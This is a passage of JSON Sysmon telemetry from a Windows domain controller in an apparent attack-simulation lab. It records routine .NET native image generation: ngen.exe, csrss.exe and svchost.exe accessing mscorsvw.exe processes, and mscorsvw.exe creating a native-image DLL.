08:07:12.256","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B0-5F25-0000-0010059F1000}","TargetProcessId":"1344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8197,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:12.256\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B0-5F25-0000-0010059F1000}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:12.256","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B0-5F25-0000-0010059F1000}","TargetProcessId":"1344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8198,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:12.256\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B0-5F25-0000-0010059F1000}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:12.256","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B0-5F25-0000-0010059F1000}","TargetProcessId":"1344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8199,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:15.178\r\nProcessGuid: {41C8662E-22B0-5F25-0000-0010059F1000}\r\nProcessId: 1344\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\540-0\\System.Windows.Forms.DataVisualization.dll\r\nCreationUtcTime: 2020-08-01 08:07:15.178","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:15.178","ProcessGuid":"{41C8662E-22B0-5F25-0000-0010059F1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\540-0\\System.Windows.Forms.DataVisualization.dll","CreationUtcTime":"2020-08-01 08:07:15.178","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8200,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.272\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010F3A31000}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.272","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010F3A31000}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8201,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.272\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010F3A31000}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.272","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010F3A31000}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8202,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.272\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010F3A31000}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.272","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B3-5F25-0000-0010F3A31000}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8203,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.318\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-001020CF0F00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.318","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-001020CF0F00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8204,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.318\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2296-5F25-0000-001020CF0F00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:15.318","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2296-5F25-0000-001020CF0F00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8205,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:15.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B3-5F25-0000-0010A0A71000}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 